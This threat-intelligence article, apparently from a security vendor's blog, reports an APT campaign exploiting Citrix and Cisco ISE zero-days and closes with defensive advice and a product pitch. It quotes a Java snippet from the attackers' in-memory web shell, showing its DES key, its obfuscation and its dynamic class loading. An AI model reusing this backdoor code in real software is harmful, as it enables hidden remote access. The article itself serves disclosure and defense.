Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and network access control infrastructure; components of enterprises rely on managing authentication and enforcing security policies across their networks.
The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability.
Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.
The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches.
Deployment of a Custom Web Shell
Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.
Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.
The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:
if (matcher.find()) {
requestBody = matcher.group(1).replace(“*”, “a”).replace(“$”, “l”);
Cipher encodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);
decodeCipher = Cipher.getInstance(“DES/ECB/PKCS5Padding”);
byte[] key = “d384922c”.getBytes();
encodeCipher.init(1, new SecretKeySpec(key, “DES”));
decodeCipher.init(2, new SecretKeySpec(key, “DES”));
byte[] data = Base64.getDecoder().decode(requestBody);
data = decodeCipher.doFinal(data);
ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
if (proxyClass == null) {
proxyClass = this.defineClass(data);
} else {
Object f = proxyClass.newInstance();
f.equals(arrOut);
f.equals(request);
f.equals(data);
f.toString();
}
}
Defensive Measures for CVE-2025-20337 and CVE-2025-5777
The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.
The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data.
Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to:
- Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.
- Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies.
- Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.
- Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.
Conclusion
Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent.
Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do.
Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats.
